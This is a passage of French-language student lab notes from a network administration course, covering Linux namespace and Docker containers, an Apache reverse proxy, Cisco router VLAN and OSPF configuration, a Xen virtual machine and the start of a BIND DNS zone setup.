==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
